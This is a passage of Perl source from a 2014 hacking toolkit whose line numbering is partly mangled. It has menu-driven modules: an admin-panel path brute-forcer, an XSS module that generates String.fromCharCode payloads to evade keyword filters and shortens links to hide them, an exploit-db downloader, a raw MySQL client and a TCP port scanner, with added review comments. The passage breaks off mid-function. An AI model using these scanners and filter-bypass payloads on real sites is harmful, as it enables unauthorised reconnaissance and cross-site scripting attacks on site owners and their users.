1506 | \t\t ¾¾¾¾ ¾¾¾¾ | |
1507 | ||
1508 | ||
1509 | ||
1510 | ||
1511 | ||
1512 | ", "logos", "7", "5" ); | |
1513 | ||
1514 | } | |
1515 | ||
1516 | } | |
1517 | ||
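# Central console output/input helper.
#
# Arguments (positional):
#   1. text to show
#   2. mode: "text" (may use the typing effect), "logos" (always printed at
#      once) or "stdin" (show the text as a prompt and read one line)
#   3. colour code placed after "\x03" when colours are enabled
#   4. colour code for the typed answer; a "stdin" call with an empty value
#      here does nothing
#
# The "colors=" and "efect=" settings are re-read on every call.
#
# Returns the line read, without its newline, in "stdin" mode; undef there
# when standard input is closed.  Other modes have no meaningful return value.
#
# Fixes over the original: missing settings or arguments no longer reach
# `eq`/`=~` as undef, and chomp is skipped when nothing could be read.
sub printear {
    my ( $texto, $modo, $color, $color_entrada ) = @_;
    $modo = "" unless defined $modo;

    my $word = getdatanownownownow();
    $word = "" unless defined $word;

    my ($colores) = $word =~ /colors=(.*)/;
    my ($efecto)  = $word =~ /efect=(.*)/;

    my $con_color    = defined $colores       && $colores eq "y";
    my $con_efecto   = defined $efecto        && $efecto =~ /y/;
    my $pide_entrada = defined $color_entrada && $color_entrada ne "";

    if ( $modo eq "text" ) {
        if ($con_color) {
            my $pintado = "\x03" . $color . $texto . "\x030";
            if   ($con_efecto) { texto_raro($pintado); }
            else               { cprint($pintado); }
        }
        elsif ($con_efecto) {
            texto_raro($texto);
        }
        else {
            print($texto);
        }
        return;
    }

    if ( $modo eq "logos" ) {
        if   ($con_color) { cprint( "\x03" . $color . $texto . "\x030" ); }
        else              { print($texto); }
        return;
    }

    if ( $modo eq "stdin" ) {
        return unless $pide_entrada;

        if ($con_color) {

            # Prompt in its colour, then switch to the answer colour.
            cprint( "\x03" . $color . $texto . "\x030" . "\x03" . $color_entrada );
        }
        elsif ($con_efecto) {
            texto_raro($texto);
        }
        else {
            cprint($texto);
        }

        my $op = <stdin>;
        chomp $op if defined $op;    # undef means end of input

        cprint("\x030") if $con_color;    # reset the colour after the answer
        return $op;
    }

    print "error\n";
    return;
}    # End of printear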
1592 | ||
# Typing effect: print the given text one character at a time, calling
# usleep(40_000) before each character.
sub texto_raro {
    my ($texto) = @_;

    foreach my $letra ( split //, $texto ) {
        usleep(40_000);
        print $letra;
    }
}
1600 | ||
# Clear the terminal: "cls" when $^O reports Win32, "clear" everywhere else.
# The command is a fixed string; no input reaches the shell.
sub clean {
    my $comando = ( $^O =~ /Win32/i ) ? "cls" : "clear";
    system($comando);
}
1610 | ||
# Print the copyright line and end the program with exit status 1.
sub copyright_menu {
    my $aviso = "\n\n\t\t\t(C) Doddy Hackman 2014\n\n";
    printear( $aviso, "text", "11", "5" );
    exit(1);
}
1615 | ||
1616 | ##Funciones del programa ## | |
1617 | ||
# Interactive front end for scan_panel(): asks for a page address and for
# the number of hits after which the search stops (3 when left empty), runs
# the search and then calls adios().
#
# Typing "exit" as the page opens the main menu through
# estoydentroporahora(); if that call returns, the prompts below still run.
sub start_panel {

    head_panel();

    my $page = printear( "[+] Page : ", "stdin", "11", "13" );
    estoydentroporahora() if $page eq "exit";

    my $count = printear( "\n[+] Count : ", "stdin", "11", "13" );
    $count = 3 if $count eq "";

    scan_panel( $page, $count );
    adios();

}
1637 | ||
# Request every entry of @paneles under the scheme and host of the given
# page and report the ones that answer with a success status.
#
# Arguments: the page address, and the number of hits after which the loop
# stops.  Each hit is printed and passed to savefile() with "admin_logs.txt".
#
# NOTE(review): $code and $controlt are not declared in this sub, and
# $controlt is never reset here, so a hit from an earlier call may suppress
# the "Not found anything" message -- confirm against their declarations.
# The hit limit is compared with `eq`, i.e. as a string.
sub scan_panel {

    my ( $pagina, $limite ) = @_;

    # Keep only scheme and authority; path, query and fragment are dropped.
    my ( $scheme, $auth ) = uri_split($pagina);
    my $base = $scheme . "://" . $auth;

    my $hallados = 0;

    printear( "\n[+] Searching .....\n\n", "text", "13", "5" );

    for my $ruta (@paneles) {

        last if $hallados eq $limite;

        my $url = $base . "/" . $ruta;
        $code = tomados($url);

        next unless $code->is_success;

        $controlt = 1;
        $hallados++;
        printear( "\a\a[Link] : " . $url . "\n", "text", "7", "5" );

        savefile( "admin_logs.txt", $url );
    }

    if ( $controlt ne 1 ) {
        printear( "[-] Not found anything\n", "text", "5", "5" );
    }

}    ##
1676 | ||
1677 | sub head_panel { | |
1678 | printear( " | |
1679 | ||
1680 | ||
1681 | @ @@@@ @ @ @ @ @ @@@@@ @ @ @ @@@@ | |
1682 | @ @ @ @ @ @ @@ @ @ @ @@ @ @ @ | |
1683 | @ @ @ @ @@ @@ @ @@ @ @ @ @@ @ @ @ | |
1684 | @ @ @ @ @@ @@ @ @ @ @ @ @ @ @ @ @ @ | |
1685 | @ @ @ @ @ @ @ @ @ @ @ @ @@@@ @ @ @ @ @ @ | |
1686 | @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ | |
1687 | @@@@@ @ @ @ @ @ @ @ @@ @ @ @ @@ @ @ | |
1688 | @ @ @ @ @ @ @ @ @ @@ @ @ @ @@ @ @ | |
1689 | @ @ @@@@ @ @ @ @ @ @ @ @ @ @@@@ | |
1690 | ||
1691 | ||
1692 | ||
1693 | ", "logos", "7", "5" ); | |
1694 | ||
1695 | } | |
1696 | ||
1697 | sub genlogs { | |
1698 | ||
1699 | my $cantidad = int(@files_gen); | |
1700 | my $control_entrada; | |
1701 | my $control_salida; | |
1702 | my $contenido; | |
1703 | my $nuevo_nombre; | |
1704 | ||
1705 | for my $file (@files_chau_gen) { | |
1706 | unlink( getcwd() . "/logs_html/" . $file ); | |
1707 | } | |
1708 | ||
1709 | for my $contador ( 0 .. $cantidad - 1 ) { | |
1710 | ||
1711 | $control_entrada = $files_gen[$contador]; | |
1712 | $control_salida = $files_chau_gen[$contador]; | |
1713 | ||
1714 | if ( $control_entrada eq "kobra" ) { | |
1715 | ||
1716 | borrar_archivos( getcwd() . "/" . "logs_html/webs/" ); | |
1717 | ||
1718 | opendir my ($listando), getcwd() . "/logs/webs/"; | |
1719 | my @archivos = readdir $listando; | |
1720 | closedir $listando; | |
1721 | ||
1722 | savefil( "logs_html/kobra.html", $comienzo_html ); | |
1723 | ||
1724 | savefil( "logs_html/kobra.html", | |
1725 | "<table border=1><td>Logs</td><tr>" ); | |
1726 | ||
1727 | for my $archivo (@archivos) { | |
1728 | ||
1729 | if ( -f getcwd() . "/logs/webs/" . $archivo ) { | |
1730 | ||
1731 | $nuevo_nombre = $archivo; | |
1732 | $nuevo_nombre =~ s/.txt/.html/ig; | |
1733 | ||
1734 | savefil( "logs_html/kobra.html", | |
1735 | "<td>" | |
1736 | . "<a href='webs/" | |
1737 | . $nuevo_nombre . "'>" | |
1738 | . $archivo . "</a>" | |
1739 | . "</td><tr>" ); | |
1740 | ||
1741 | $contenido = | |
1742 | savewords( getcwd() . "/logs/webs/" . $archivo ); | |
1743 | $contenido =~ s/\n/<br>/ig; | |
1744 | ||
1745 | savefil( "logs_html/webs/" . $nuevo_nombre, | |
1746 | $comienzo_html ); | |
1747 | savefil( "logs_html/webs/" . $nuevo_nombre, "<fieldset>" ); | |
1748 | savefil( "logs_html/webs/" . $nuevo_nombre, $contenido ); | |
1749 | savefil( "logs_html/webs/" . $nuevo_nombre, "</fieldset>" ); | |
1750 | savefil( "logs_html/webs/" . $nuevo_nombre, $final_html ); | |
1751 | ||
1752 | } | |
1753 | } | |
1754 | savefil( "logs_html/kobra.html", "</table>" ); | |
1755 | savefil( "logs_html/kobra.html", $final_html ); | |
1756 | ||
1757 | } | |
1758 | elsif ( $control_entrada eq "csrf" ) { | |
1759 | ||
1760 | borrar_archivos( getcwd() . "/" . "logs_html/csrf/" ); | |
1761 | ||
1762 | opendir my ($listando), getcwd() . "/logs/csrf/"; | |
1763 | my @archivos = readdir $listando; | |
1764 | closedir $listando; | |
1765 | ||
1766 | savefil( "logs_html/csrf.html", $comienzo_html ); | |
1767 | savefil( "logs_html/csrf.html", | |
1768 | "<table border=1><td>Logs</td><tr>" ); | |
1769 | ||
1770 | for my $archivo (@archivos) { | |
1771 | ||
1772 | if ( -f getcwd() . "/logs/csrf/" . $archivo ) { | |
1773 | ||
1774 | #print $archivo."\n"; | |
1775 | ||
1776 | $nuevo_nombre = $archivo; | |
1777 | $nuevo_nombre =~ s/.html/.txt/ig; | |
1778 | ||
1779 | savefil( "logs_html/csrf/" . $nuevo_nombre, | |
1780 | savewords( getcwd() . "/logs/csrf/" . $archivo ) ); | |
1781 | ||
1782 | savefil( "logs_html/csrf.html", | |
1783 | "<td>" | |
1784 | . "<a href='csrf/" | |
1785 | . $nuevo_nombre . "'>" | |
1786 | . $nuevo_nombre . "</a>" | |
1787 | . "</td><tr>" ); | |
1788 | ||
1789 | } | |
1790 | } | |
1791 | ||
1792 | savefil( "logs_html/csrf.html", "</table>" ); | |
1793 | savefil( "logs_html/csrf.html", $final_html ); | |
1794 | ||
1795 | } | |
1796 | elsif ( $control_entrada eq "fsd" ) { | |
1797 | ||
1798 | borrar_archivos( getcwd() . "/" . "logs_html/fsdlogs/" ); | |
1799 | ||
1800 | opendir my ($listando), getcwd() . "/logs/fsdlogs/"; | |
1801 | my @archivos = readdir $listando; | |
1802 | closedir $listando; | |
1803 | ||
1804 | savefil( "logs_html/fsd.html", $comienzo_html ); | |
1805 | savefil( "logs_html/fsd.html", | |
1806 | "<table border=1><td>Logs</td><tr>" ); | |
1807 | ||
1808 | for my $archivo (@archivos) { | |
1809 | ||
1810 | if ( -f getcwd() . "/logs/fsdlogs/" . $archivo ) { | |
1811 | ||
1812 | #print $archivo."\n"; | |
1813 | ||
1814 | $nuevo_nombre = $archivo; | |
1815 | $nuevo_nombre =~ s/.html/.txt/ig; | |
1816 | $nuevo_nombre =~ s/.php/.txt/ig; | |
1817 | ||
1818 | savefil( "logs_html/fsdlogs/" . $nuevo_nombre, | |
1819 | savewords( getcwd() . "/logs/fsdlogs/" . $archivo ) ); | |
1820 | ||
1821 | savefil( "logs_html/fsd.html", | |
1822 | "<td>" | |
1823 | . "<a href='fsdlogs/" | |
1824 | . $nuevo_nombre . "'>" | |
1825 | . $nuevo_nombre . "</a>" | |
1826 | . "</td><tr>" ); | |
1827 | } | |
1828 | } | |
1829 | ||
1830 | } | |
1831 | ||
1832 | elsif ( $control_entrada eq "exploitdb" ) { | |
1833 | ||
1834 | borrar_archivos( getcwd() . "/" . "logs_html/exploitdb/" ); | |
1835 | ||
1836 | opendir my ($listando), getcwd() . "/logs/exploitdb/"; | |
1837 | my @archivos = readdir $listando; | |
1838 | closedir $listando; | |
1839 | ||
1840 | savefil( "logs_html/exploitdb.html", $comienzo_html ); | |
1841 | ||
1842 | for my $archivo (@archivos) { | |
1843 | ||
1844 | my $dircon = getcwd() . "/logs/exploitdb/" . $archivo; | |
1845 | ||
1846 | if ( -d $dircon and $archivo ne "." and $archivo ne ".." ) { | |
1847 | ||
1848 | savefil( "logs_html/exploitdb.html", | |
1849 | "<table border=1><td><b><center>" | |
1850 | . $archivo | |
1851 | . "</center></b></td><tr>" ); | |
1852 | ||
1853 | #print "[+] Dir : ".$dircon."\n"; | |
1854 | ||
1855 | opendir my ($listando), $dircon; | |
1856 | my @archivosmas = readdir $listando; | |
1857 | closedir $listando; | |
1858 | ||
1859 | for my $archi (@archivosmas) { | |
1860 | if ( -f $dircon . "/" . $archi ) { | |
1861 | ||
1862 | ## yeah <td> </td> | |
1863 | savefil( "logs_html/exploitdb.html", | |
1864 | "<td>" | |
1865 | . "<a href='exploitdb/" | |
1866 | . $archi . "'>" | |
1867 | . $archi . "</a>" | |
1868 | . "</td><tr>" ); | |
1869 | ||
1870 | savefil( | |
1871 | "logs_html/exploitdb/" . $archi, | |
1872 | savewords( $dircon . "/" . $archi ) | |
1873 | ); | |
1874 | ||
1875 | #print "[+] File : ".$archi."\n"; | |
1876 | } | |
1877 | } | |
1878 | } | |
1879 | savefil( "logs_html/exploitdb.html", "</table><br>" ); | |
1880 | } | |
1881 | ||
1882 | savefil( "logs_html/exploitdb.html", $final_html ); | |
1883 | } | |
1884 | elsif ( $control_entrada eq "xss-logs.txt" ) { | |
1885 | ||
1886 | $contenido = savewords( "logs/" . $control_entrada ); | |
1887 | savefil( "logs_html/" . $control_salida, $comienzo_html ); | |
1888 | $contenido =~ s/\n/<br>/ig; | |
1889 | $contenido =~ s/<script>/1/ig; | |
1890 | $contenido =~ s/<\/script>/1/ig; | |
1891 | savefil( | |
1892 | "logs_html/" . $control_salida, | |
1893 | "<fieldset>$contenido</fieldset>" | |
1894 | ); | |
1895 | savefil( "logs_html/" . $control_salida, $final_html ); | |
1896 | ||
1897 | } | |
1898 | else { | |
1899 | ||
1900 | $contenido = savewords( "logs/" . $control_entrada ); | |
1901 | savefil( "logs_html/" . $control_salida, $comienzo_html ); | |
1902 | $contenido =~ s/\n/<br>/ig; | |
1903 | savefil( | |
1904 | "logs_html/" . $control_salida, | |
1905 | "<fieldset>$contenido</fieldset>" | |
1906 | ); | |
1907 | savefil( "logs_html/" . $control_salida, $final_html ); | |
1908 | ||
1909 | } | |
1910 | } | |
1911 | ||
1912 | } | |
1913 | ||
## Prints the banner of the XSS module.
## The text is handed to printear() together with the arguments
## "logos", "7", "5" (their meaning is defined by printear, elsewhere in the file).
sub head_xss {

    # One element per output row; the empty strings reproduce the blank
    # lines that surround the logo.
    my @filas = (
        '', '', '', '',
        '@ @ @@@ @@@ @@@@@ @@@@ @@@@ @',
        '@ @ @ @ @ @ @ @ @ @ @ @',
        '@ @ @ @ @ @ @ @ @ @',
        '@ @ @ @ @ @ @ @ @ @',
        '@ @@@ @@@ @ @ @ @ @ @',
        '@ @ @ @ @ @ @ @ @ @',
        '@ @ @ @ @ @ @ @ @ @',
        '@ @ @ @ @ @ @ @ @ @ @ @',
        '@ @ @@@ @@@ @ @@@@ @@@@ @@@@@',
        '', '', '', '',
    );

    return printear( join( "\n", @filas ), "logos", "7", "5" );
}
1933 | ||
## Interactive menu of the XSS module.
##
## Option 1 asks for a page and hands it to scanxss() with the flag "yes".
## Option 2 wraps the typed string, converted by encode(), in a <script>
##          element that rebuilds it with String.fromCharCode and writes
##          it into the document.
## Option 3 sends the typed string to the tinyurl.com API through toma()
##          and prints the returned short link.
## Any other option goes straight to adios().
##
## Defender's note: the option-2 output contains none of the original
## string's characters, so a filter that searches request data for literal
## keywords does not see them; context-aware output encoding and a
## Content-Security-Policy are the controls that still apply.
sub xss_scan {
    clean();
    head_xss();

    my $menu = join "\n",
      '', '[++] Options', '',
      '[+] 1 : XSS Scan',
      '[+] 2 : Generate ByPass',
      '[+] 3 : Hide URL',
      '[+] 4 : Exit',
      '', '';
    printear( $menu, "text", "13", "5" );

    my $op = printear( "[+] Option : ", "stdin", "11", "13" );

    if ( $op eq "1" ) {

        my $pagina = printear( "\n[+] Page : ", "stdin", "11", "13" );
        scanxss( $pagina, "yes" );
    }
    elsif ( $op eq "2" ) {

        my $cadena = printear( "\n[+] String : ", "stdin", "11", "13" );

        if ( $cadena eq "" ) {
            printear( "\n[-] Write the string !\n", "text", "5", "5" );
        }
        else {
            my $salida =
                "\n[XSS] : <script>var code =String.fromCharCode("
              . encode($cadena)
              . "); document.write(code);</script>\n";
            printear( $salida, "text", "13", "5" );
        }
    }
    elsif ( $op eq "3" ) {

        my $nueva = printear( "\n[+] String : ", "stdin", "11", "13" );

        # The typed string is appended to the query as-is (no URL escaping)
        # and the request goes out over plain HTTP.
        my $code = toma( "http://tinyurl.com/api-create.php?url=" . $nueva );

        if ( $code =~ /Error/ig ) {
            printear( "\n[+] Error\n", "text", "5", "5" );
        }
        else {
            printear( "\n[+] Link : " . $code . "\n", "text", "13", "5" );
        }
    }

    # Every branch of the menu, including "4" and unknown input, ends here.
    adios();
}
1998 | ||
## Prints the banner of the MySQL manager module through printear(),
## using the arguments "logos", "7", "5".
sub head_mysqlman {

    # One element per output row; the empty strings reproduce the blank
    # lines that surround the logo.
    my @filas = (
        '', '', '', '',
        '@ @ @ @ @@@ @@@@ @',
        '@ @ @ @ @ @ @ @ @',
        '@@ @@ @ @ @ @ @ @',
        '@@ @@ @ @ @ @ @ @',
        '@ @ @ @ @ @@@ @ @ @',
        '@ @ @ @ @ @ @ @ @',
        '@ @ @ @ @ @ @ @ @',
        '@ @ @ @ @ @ @ @@ @',
        '@ @ @ @@@ @@@@ @@@@@',
        '@',
        '', '', '', '',
    );

    return printear( join( "\n", @filas ), "logos", "7", "5" );
}
2019 | ||
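## Minimal interactive MySQL client.
##
## Asks for hostname, username and password, connects with DBI to port
## 3306 of that host and then runs every typed line as a statement until
## the user types "exit". Column names and rows are printed tab-separated.
##
## Notes for whoever runs this:
##  - the password is read through the same printear() prompt as the other
##    fields; whether it is echoed depends on printear (not visible here);
##  - the DSN carries no TLS options, so credentials and results cross the
##    network as the driver sends them by default;
##  - the typed statement is passed to prepare() verbatim, which is the
##    purpose of the prompt.
##
## $info and $re are package variables in the original and are left so.
sub mysqlman {

    clean();
    head_mysqlman();

    my $host = printear( "[+] Hostname : ",   "stdin", "11", "13" );
    my $user = printear( "\n[+] Username : ", "stdin", "11", "13" );
    my $pass = printear( "\n[+] Password : ", "stdin", "11", "13" );

    printear( "\n[+] Connecting to the server\n", "text", "13", "5" );

    $info = "dbi:mysql::" . $host . ":3306";
    my $enter = DBI->connect( $info, $user, $pass, { PrintError => 0 } );

    unless ($enter) {
        print "\n[-] Error connecting\n";
        return adios();
    }

    printear( "\n[+] Enter in the database\n", "text", "13", "5" );

  QUERY:
    while (1) {

        my $ac = printear( "\n[+] Query : ", "stdin", "11", "13" );

        # Leave the loop on "exit" (or when the prompt yields nothing at
        # all) instead of falling through to prepare() on a closed handle.
        if ( !defined $ac or $ac eq "exit" ) {
            $enter->disconnect;
            printear( "\n[+] Closing connection\n", "text", "5", "5" );
            last QUERY;
        }

        # prepare() and execute() return false on failure because
        # RaiseError is not set; check both before touching the handle.
        $re = $enter->prepare($ac);
        unless ( $re and $re->execute() ) {
            printear( "\n[-] Query Error\n", "text", "5", "5" );
            next QUERY;
        }

        my $total = $re->rows();
        if ( !defined $total or $total == -1 ) {
            printear( "\n[-] Query Error\n", "text", "5", "5" );
            next QUERY;
        }

        # Statements that return no result set have no column list.
        my @columnas = $re->{NAME} ? @{ $re->{NAME} } : ();

        printear( "\n[+] Result of the query\n", "text", "13", "5" );

        if ( $total == 0 ) {
            printear( "\n[+] Not rows returned\n", "text", "5", "5" );
            next QUERY;
        }

        printear( "\n[+] Rows returned : " . $total . "\n\n",
            "text", "13", "5" );

        for my $columna (@columnas) {
            printear( $columna . "\t\t", "text", "7", "5" );
        }
        print "\n";

        next QUERY unless @columnas;

        while ( my @fila = $re->fetchrow_array ) {
            for my $valor (@fila) {

                # SQL NULL arrives as undef; print it as an empty cell.
                $valor = "" unless defined $valor;
                printear( $valor . "\t\t", "text", "7", "5" );
            }
            print "\n";
        }
    }

    adios();

}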
2092 | ||
## Prints the banner of the exploit-db search module through printear(),
## using the arguments "logos", "7", "5".
sub head_exploitdb {

    # One element per output row; the empty strings reproduce the blank
    # lines that surround the logo.
    my @filas = (
        '', '', '', '',
        '@@@@@ @ @ @@@@@ @ @@@@ @ @@@@@ @@@@ @@@@',
        '@ @ @ @ @ @ @ @ @ @ @ @ @ @',
        '@ @ @ @ @ @ @ @ @ @ @ @ @ @',
        '@ @ @ @ @ @ @ @ @ @ @ @ @ @',
        '@@@@ @ @@@@@ @ @ @ @ @ @ @ @@@@',
        '@ @ @ @ @ @ @ @ @ @ @ @ @',
        '@ @ @ @ @ @ @ @ @ @ @ @ @',
        '@ @ @ @ @ @ @ @ @ @ @ @ @',
        '@@@@@ @ @ @ @@@@@ @@@@ @ @ @@@@ @@@@',
        '', '', '', '',
    );

    return printear( join( "\n", @filas ), "logos", "7", "5" );
}
2112 | ||
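## Searches exploit-db.com for a typed string and stores every result as
## a text file under logs/exploitdb/<search string>/.
##
## Changes against the original, all on the local-file side:
##  - the directory test now checks the directory that is created (the
##    original tested the bare search string);
##  - mkdir/chmod receive a numeric octal mode as first/second argument in
##    the order Perl expects; the original passed the string "0777" and,
##    in one chmod call, swapped mode and path;
##  - directories are created 0755 and files 0644 instead of 0777, since
##    the saved files come from a remote site and need not be writable by
##    every local user;
##  - names taken from the search string and from the remote page titles
##    lose path separators, quotes, angle brackets, "&" and control
##    characters before they become file names. The HTML log writer in
##    this file prints those names into <a href='...'> without escaping.
##
## The downloads use plain http://, so the content is not integrity
## protected in transit; treat the saved files as untrusted input.
sub exploitdb {

    clean();
    head_exploitdb();

    my $cosa = printear( "[+] String : ", "stdin", "11", "13" );

    if ( $cosa eq "" ) { adios(); }
    printear( "\n[+] Searching string\n", "text", "13", "5" );
    my %found = buscar($cosa);

    # The "- 1" is kept from the original; presumably it discounts one
    # link that is not a result -- TODO confirm against getlinks().
    $total = int( keys %found ) - 1;
    printear( "\n[+] Exploits Found : " . $total . "\n\n", "text", "13", "5" );

    my $carpeta = _nombre_seguro($cosa);
    $carpeta = "search" if $carpeta eq "";
    my $dir = "logs/exploitdb/" . $carpeta;

    unless ( -d $dir ) {
        mkdir( $dir, 0755 )
          or printear( "\n[-] Cannot create " . $dir . " : $!\n",
            "text", "5", "5" );
    }

    for my $da ( keys %found ) {

        # Same characters the original removed, plus the ones stripped by
        # _nombre_seguro().
        my $tata = _nombre_seguro($da);
        $tata =~ tr{=()_}{}d;
        $tata =~ s/\s+\z//;

        my $destino = $dir . "/" . $tata . ".txt";

        if ( download( $found{$da}, $destino ) ) {
            printear( "[Exploit Found] : " . $da . "\n", "text", "7", "5" );
            chmod 0644, $destino;
        }

    }

    chmod 0755, $dir;

    printear( "\n[+] Finished\n", "text", "13", "5" );

    adios();

}

## Removes characters that must not reach a file name or the unescaped
## HTML log: path separators, quotes, angle brackets, "&", control
## characters and leading dots.
sub _nombre_seguro {
    my ($texto) = @_;
    $texto = "" unless defined $texto;
    $texto =~ tr{/\\<>'"&\x00-\x1F}{}d;
    $texto =~ s/\A\.+//;
    return $texto;
}

## Walks the result pages (at most 666) for the given description and
## returns the title => download-URL hash built by getlinks().
## %busca is a package variable, as in the original.
sub buscar {
    my ($termino) = @_;

    for my $n ( 1 .. 666 ) {
        my $code = toma(
            "http://www.exploit-db.com/search/?action=search&filter_page="
              . $n
              . "&filter_description="
              . $termino
              . "&filter_exploit_text=&filter_author=&filter_platform=0&filter_type=0&filter_lang_id=0&filter_port=&filter_osvdb=&filter_cve="
        );

        # An empty answer means the request failed; stop instead of
        # requesting the remaining pages.
        last if !defined $code or $code eq "";

        chomp $code;
        last if $code =~ /No results/i;

        %busca = getlinks($code);
    }

    # The original returned nothing when all 666 pages had results.
    return %busca;
}

## Parses one result page with HTML::Parser and returns the accumulated
## %links hash (package variable filled by the text() handler).
sub getlinks {

    my $test = HTML::Parser->new(
        start_h => [ \&start, "tagname,attr" ],
        text_h  => [ \&text,  "dtext" ],
    );
    $test->parse( $_[0] );

    return %links;
}

## HTML::Parser start-tag handler: remembers the href of every <a> tag in
## the package variables $d (href) and $c (tag name).
sub start {
    my ( $tag, $attr ) = @_;

    if ( $tag eq "a" ) {
        $d = defined $attr->{href} ? $attr->{href} : "";
        $c = $tag;
    }
}

## HTML::Parser text handler: when the pending href points at an exploit
## page, stores title => download URL in %links.
sub text {
    my $title = shift;
    chomp $title;

    if ( defined $c and $c eq "a" ) {
        if ( defined $d and $d =~ /www\.exploit-db\.com\/exploits\/(.*)/ ) {
            $links{$title} = "http://www.exploit-db.com/download/" . $1;
        }
        $d = "";
    }
}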
2207 | ||
## Prints the banner of the encoder/decoder module through printear(),
## using the arguments "logos", "7", "5".
sub head_encodedecode {

    # One element per output row; the empty strings reproduce the blank
    # lines that surround the logo.
    my @filas = (
        '', '',
        '@@@@@ @ @ @@@@ @@@@ @@@@ @@@@@ @@@@@',
        '@ @@ @ @ @ @ @ @ @ @ @ @',
        '@ @@ @ @ @ @ @ @ @ @ @',
        '@ @ @ @ @ @ @ @ @ @ @ @',
        '@@@@ @ @ @ @ @ @ @ @ @@@@ @@@@@',
        '@ @ @ @ @ @ @ @ @ @ @ @',
        '@ @ @@ @ @ @ @ @ @ @ @',
        '@ @ @@ @ @ @ @ @ @ @ @ @',
        '@@@@@ @ @ @@@@ @@@@ @@@@ @@@@@ @ @',
        '', '', '',
    );

    return printear( join( "\n", @filas ), "logos", "7", "5" );
}
2224 | ||
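## Menu of text transformations: MD5, base64, ASCII codes, hex, URL
## escaping and binary digits.
##
## The eleven near-identical branches of the original are replaced by one
## dispatch table. Two defects go away with it:
##  - option 4 started a second, independent if-chain, so options 1-3 also
##    reached that chain's final "else";
##  - option 5 appended the "\n" to the argument of ascii_de() instead of
##    to its result, unlike every other option.
##
## "MD5 encoder" is the menu's wording; md5_hex() computes a one-way
## digest, it does not encode anything that can be decoded again.
sub encodedecode {

    clean();
    head_encodedecode();

    my $menu = join "\n",
      '', '[++] Options', '',
      '[+] 1 : MD5 encoder',
      '[+] 2 : base64 encoder',
      '[+] 3 : base64 decoder',
      '[+] 4 : ASCII encoder',
      '[+] 5 : ASCII decoder',
      '[+] 6 : HEX encoder',
      '[+] 7 : HEX decoder',
      '[+] 8 : URL encoder',
      '[+] 9 : URL decoder',
      '[+] 10 : Text to BIN',
      '[+] 11 : BIN to Text',
      '[+] 12 : Exit',
      '', '';
    printear( $menu, "text", "13", "5" );

    # Menu option => transformation. Anonymous subs are used so that each
    # function is called with exactly one argument, as in the original.
    my %transformar = (
        "1"  => sub { md5_hex( $_[0] ) },
        "2"  => sub { encode_base64( $_[0] ) },
        "3"  => sub { decode_base64( $_[0] ) },
        "4"  => sub { ascii( $_[0] ) },
        "5"  => sub { ascii_de( $_[0] ) },
        "6"  => sub { encode( $_[0] ) },
        "7"  => sub { decode( $_[0] ) },
        "8"  => sub { uri_escape( $_[0] ) },
        "9"  => sub { uri_unescape( $_[0] ) },
        "10" => sub { unpack( "B*", $_[0] ) },
        "11" => sub { pack( "B*", $_[0] ) },
    );

    my $op = printear( "[+] Option : ", "stdin", "11", "13" );
    $op = "" unless defined $op;

    if ( my $accion = $transformar{$op} ) {
        my $texto     = printear( "\n[+] Text : ", "stdin", "11", "13" );
        my $resultado = $accion->($texto);
        printear( "\n[+] Result : " . $resultado . "\n", "text", "13", "5" );
    }

    # "12" and any unknown option end here without a prompt.
    adios();

}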
2359 | ||
## Prints the banner of the port scanner module through printear(),
## using the arguments "logos", "7", "5".
sub head_portscanner {

    # One element per output row; the empty strings reproduce the blank
    # lines that surround the logo.
    my @filas = (
        '', '',
        '@@@@@ @@@@ @@@@@ @@@@@ @@@ @@@@ @ @ @',
        '@ @ @ @ @ @ @ @ @ @ @ @ @@ @',
        '@ @ @ @ @ @ @ @ @ @ @ @@ @',
        '@ @ @ @ @ @ @ @ @ @ @ @ @ @',
        '@@@@@ @ @ @@@@@ @ @@@ @ @ @ @ @ @',
        '@ @ @ @ @ @ @ @ @ @ @ @ @',
        '@ @ @ @ @ @ @ @ @@@@@ @ @@',
        '@ @ @ @ @ @ @ @ @ @@ @ @ @@',
        '@ @@@@ @ @ @ @@@ @@@@ @ @ @ @',
        '', '',
    );

    return printear( join( "\n", @filas ), "logos", "7", "5" );

}
2376 | ||
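## TCP connect check against a host.
##
## Option 1 tries six fixed ports (21, 22, 25, 80, 110, 3306) and prints
## the service name configured for each port that accepts a connection.
## Option 2 tries every port of a typed range.
## Any other option goes straight to adios().
##
## Changes against the original:
##  - the range limits are validated (digits only, 1..65535, start <= end)
##    before they reach the ".." operator;
##  - the fixed ports are tried in numeric order instead of hash order, so
##    the output is reproducible;
##  - IO::Socket::INET->new replaces the indirect-object call, the
##    duplicated Timeout key is gone and every socket is closed explicitly.
##
## A full connection is opened for each port, so the peer's service and
## firewall logs record every attempt.
sub portscanner {

    clean();
    head_portscanner();

    my $menu = join "\n",
      '', '[++] Options', '',
      '[+] 1 : Simple Scan',
      '[+] 2 : Full Scan',
      '[+] 3 : Exit',
      '', '';
    printear( $menu, "text", "13", "5" );

    my $op = printear( "[+] Option : ", "stdin", "11", "13" );

    # Returns true when a TCP connection to $ip:$port succeeds within
    # half a second.
    my $abierto = sub {
        my ( $ip, $port ) = @_;
        my $socket = IO::Socket::INET->new(
            PeerAddr => $ip,
            PeerPort => $port,
            Proto    => "tcp",
            Timeout  => 0.5
        );
        return 0 unless $socket;
        close $socket;
        return 1;
    };

    if ( $op eq "1" ) {

        my %ports = (
            "21"   => "ftp",
            "22"   => "ssh",
            "25"   => "smtp",
            "80"   => "http",
            "110"  => "pop3",
            "3306" => "mysql"
        );

        my $ip = printear( "\n[+] IP : ", "stdin", "11", "13" );

        printear( "\n[+] Scanning $ip ...\n\n", "text", "13", "5" );

        for my $port ( sort { $a <=> $b } keys %ports ) {
            next unless $abierto->( $ip, $port );
            printear(
                "[Port] : "
                  . $port
                  . " [Service] : "
                  . $ports{$port} . "\n",
                "text", "7", "5"
            );
        }

        printear( "\n[+] Finished\n", "text", "13", "5" );

    }
    elsif ( $op eq "2" ) {

        my $ip    = printear( "\n[+] IP : ",         "stdin", "11", "13" );
        my $start = printear( "\n[+] Start Port : ", "stdin", "11", "13" );
        my $end   = printear( "\n[+] End Port : ",   "stdin", "11", "13" );

        my $valido = 1;
        for my $limite ( $start, $end ) {
            $valido = 0
              unless defined $limite
              and $limite =~ /\A[0-9]+\z/
              and $limite >= 1
              and $limite <= 65535;
        }
        $valido = 0 if $valido and $start > $end;

        if ($valido) {
            printear( "\n[+] Scanning $ip ...\n\n", "text", "13", "5" );

            for my $port ( $start .. $end ) {
                next unless $abierto->( $ip, $port );
                printear( "[+] Port Found : " . $port . "\n",
                    "text", "7", "5" );
            }
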